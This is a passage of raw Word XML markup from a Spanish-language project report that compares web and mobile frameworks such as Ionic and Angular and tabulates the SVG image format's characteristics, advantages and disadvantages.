              <w:t xml:space="preserve"> Design pues a pesar de que </w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>aún</w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> no es muy conocido como Bootstrap o Foundation es muy fácil utilizarlo e implementarlo en el desarrollo web además que es uno de los frameworks desarrollados por la empresa líder en la informática Google.  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00081D6F" w:rsidRPr="00081D6F" w:rsidRDefault="00081D6F" w:rsidP="00081D6F">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">En cuanto a las tecnologías de desarrollo de aplicaciones web y mobiles a nuestra consideración como quipo es Ionic el cual es una herramienta gratuita y open source, </w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>está</w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> basado en </w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">, css, JavaScript y construida con sass y se puede optimizar con Angular el cual es un framework muy usado en la industria del software además tiene ventajas considerables como su alto rendimiento, </w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>optimización</w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> angular-</w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Ionic</w:t>
            </w:r>
            <w:r w:rsidRPr="00081D6F">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>, centro nativo, buen diseño, cli potente.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00081D6F" w:rsidRPr="00081D6F" w:rsidRDefault="00081D6F" w:rsidP="00081D6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00623075" w:rsidRDefault="00623075" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00623075" w:rsidRDefault="00623075" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00623075" w:rsidRDefault="00623075" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00623075" w:rsidRDefault="00623075" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00623075" w:rsidRDefault="00623075" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00623075" w:rsidRDefault="00623075" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00623075" w:rsidRDefault="00623075" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="002E3253">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:sectPr w:rsidR="00236265" w:rsidSect="002D6D25">
          <w:headerReference w:type="default" r:id="rId58"/>
          <w:footerReference w:type="default" r:id="rId59"/>
          <w:pgSz w:w="20160" w:h="12240" w:orient="landscape" w:code="5"/>
          <w:pgMar w:top="1701" w:right="1418" w:bottom="1701" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31662" w:rsidRDefault="002E3253" w:rsidP="002E3253">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc514520845"/>
      <w:r w:rsidRPr="002E3253">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Medios digitales</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="002E3253" w:rsidRDefault="002E3253" w:rsidP="00DA067C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E3253" w:rsidRPr="00890B46" w:rsidRDefault="002E3253" w:rsidP="002E3253">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc514520846"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Imagen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="002E3253" w:rsidRDefault="002E3253" w:rsidP="002E3253">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00006D88" w:rsidRDefault="00006D88" w:rsidP="00006D88"/>
    <w:p w:rsidR="00006D88" w:rsidRDefault="00006D88" w:rsidP="00006D88"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula5oscura-nfasis5"/>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110"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="3190"/>
        <w:gridCol w:w="3358"/>
        <w:gridCol w:w="2944"/>
      </w:tblGrid>
      <w:tr w:rsidR="004818BC" w:rsidRPr="004818BC" w:rsidTr="004818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5"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="004818BC" w:rsidRPr="004818BC" w:rsidRDefault="004818BC" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004818BC">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>IMAGEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004818BC" w:rsidRPr="00F821FC" w:rsidTr="004818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821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Formato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Definición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Características</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="002E1A7E" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Ventajas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="002E1A7E" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Desventajas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004818BC" w:rsidRPr="00F821FC" w:rsidTr="004818BC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00C9236E" w:rsidRDefault="00C9236E" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C9236E" w:rsidRDefault="00C9236E" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C9236E" w:rsidRDefault="00C9236E" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C9236E" w:rsidRDefault="00C9236E" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C9236E" w:rsidRDefault="00C9236E" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C9236E" w:rsidRDefault="00C9236E" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>SVG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="002E1A7E" w:rsidRDefault="002E1A7E" w:rsidP="004818BC">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002E1A7E" w:rsidRDefault="002E1A7E" w:rsidP="002E1A7E">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>SVG (Scalable Vector Graphics) es un formato vectorial poco conocido pero muy útil para su uso online por su flexibilidad y por la capacidad de ofrecer gráficos con calidad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="002E1A7E" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:t>Está basado en XML, de modo que es un lenguaje extensible y su fuente no sólo queda a la vista de nuestros ojos, sino que también es editable.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:t xml:space="preserve">Las compañías de software pueden ampliarlo y aplicarlo de forma más ceñida a sus necesidades, </w:t>
            </w:r>
            <w:r w:rsidRPr="002E1A7E">
              <w:lastRenderedPageBreak/>
              <w:t>sin que se pierda la comprensión prototípica y elemental entre todos ellos; es decir, siempre queda algo de entendimiento básico.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:lastRenderedPageBreak/>
              <w:t>No pierde calidad al cambiarlo de tamaño</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:t>Pesa mucho menos que otros formatos</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:t>Puedes animarlos</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:t>El contenido puede ser rastreable e indexable por Google</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:t>No es un formato accesible para el usuario común</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:t>No sustituye a otros formatos</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:t>Tiene problemas de compatibilidad</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002E1A7E">
              <w:t>Puede perjudicar el ratio texto/código de una web</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="002E1A7E" w:rsidRDefault="00F821FC" w:rsidP="002E1A7E">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004818BC" w:rsidRPr="00F821FC" w:rsidTr="004818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3E2474" w:rsidRDefault="003E2474" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
